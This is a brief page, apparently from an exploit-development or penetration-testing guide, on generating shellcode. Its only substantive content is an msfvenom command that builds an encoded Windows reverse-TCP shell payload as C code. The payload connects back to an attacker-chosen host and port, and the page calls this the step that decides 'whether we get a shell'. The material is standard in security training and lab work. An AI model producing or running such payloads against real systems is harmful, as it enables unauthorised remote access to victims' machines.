Generating Shellcode

This is the most crucial step as it decides whether we get a shell!

Generating Shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "<BADCHARS>" > shellcode.c

Last updated

Was this helpful?